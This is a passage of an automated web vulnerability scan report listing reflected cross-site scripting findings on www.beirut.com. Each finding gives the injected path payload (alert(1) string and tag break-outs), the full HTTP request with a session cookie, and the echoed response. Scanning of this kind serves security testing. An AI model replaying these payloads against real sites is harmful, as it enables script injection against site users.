var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.938. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf079'-alert(1)-'a48770eb1b3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist/29bf079'-alert(1)-'a48770eb1b3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923/Tobacconist/29bf079'-alert(1)-'a48770eb1b3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.939. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3af0c'-alert(1)-'a39c125638d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping3af0c'-alert(1)-'a39c125638d/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping3af0c'-alert(1)-'a39c125638d/Equipment-Gadgets';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.940. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c7db"><a>3daf329a215 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping8c7db"><a>3daf329a215/Equipment-Gadgets/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping8c7db"><a>3daf329a215">
...[SNIP]...

4.941. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2184c'-alert(1)-'caeee647c97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets2184c'-alert(1)-'caeee647c97/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets2184c'-alert(1)-'caeee647c97';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.942. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd721<script>alert(1)</script>612f6ddb2e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetscd721<script>alert(1)</script>612f6ddb2e8/339412286 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:58 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetscd721<script>alert(1)</script>612f6ddb2e8 <a href="#" id="backlink">
...[SNIP]...

4.943. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 367bb'-alert(1)-'d7a25211229 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping367bb'-alert(1)-'d7a25211229/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:59:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping367bb'-alert(1)-'d7a25211229/Equipment-Gadgets/339412286/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.944. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2341a"><a>75abcf4375b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2341a"><a>75abcf4375b/Equipment-Gadgets/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:50:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2341a"><a>75abcf4375b">
...[SNIP]...

4.945. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ecc06<script>alert(1)</script>33a2ca35e1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetsecc06<script>alert(1)</script>33a2ca35e1d/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetsecc06<script>alert(1)</script>33a2ca35e1d <a href="#" id="backlink">
...[SNIP]...

4.946. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64a2d'-alert(1)-'ba813a337b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets64a2d'-alert(1)-'ba813a337b6/339412286/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:02:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets64a2d'-alert(1)-'ba813a337b6/339412286/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.947. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae557'-alert(1)-'99f8cfcd546 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286ae557'-alert(1)-'99f8cfcd546/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286ae557'-alert(1)-'99f8cfcd546/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.948. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51346'-alert(1)-'c2e4df255bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets51346'-alert(1)-'c2e4df255bc/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets51346'-alert(1)-'c2e4df255bc/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.949. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1edda'-alert(1)-'67f26a7991b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/741edda'-alert(1)-'67f26a7991b HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/741edda'-alert(1)-'67f26a7991b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.950. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b790b"><a>f5041150bc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb790b"><a>f5041150bc5/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:45:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb790b"><a>f5041150bc5">
...[SNIP]...

4.951. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 657c8'-alert(1)-'879671d9669 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping657c8'-alert(1)-'879671d9669/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
